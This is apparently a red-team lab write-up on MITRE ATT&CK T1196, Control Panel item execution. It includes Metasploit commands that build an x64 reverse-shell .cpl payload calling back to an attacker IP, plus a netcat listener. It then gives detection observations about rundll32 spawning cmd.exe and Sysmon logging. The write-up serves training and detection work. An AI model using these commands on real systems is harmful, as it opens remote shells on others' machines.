T1196: Control Panel Item

Execution

Generating a simple x64 reverse shell in a .cpl format:

msfconsole
use windows/local/cve_2017_8464_lnk_lpe
set payload windows/x64/shell_reverse_tcp
set lhost 10.0.0.5
exploit

root@~# nc -lvp 4444
listening on [any] 4444 ...

We can see that the .cpl is simply a DLL with DllMain function exported:

A quick look at the dissasembly of the dll suggests that rundll32.exe will be spawned, a new thread will be created in suspended mode, which most likely will get injected with our shellcode and eventually resumed to execute that shellcode:

Invoking the shellcode via control.exe:

Attacking machine receiving the reverse shell:

Observations

Note how rundll32 spawns cmd.exe and establishes a connection back to the attacker - these are signs that should raise your suspicion when investingating a host for a compromise:

As always, sysmon logging can help in finding suspicious commandlines being executed in your environment:

Bonus - Create Shortcut With PowerShell

References

System Binary Proxy Execution: Control Panel, Sub-technique T1218.002 - Enterprise | MITRE ATT&CK®attack.mitre.org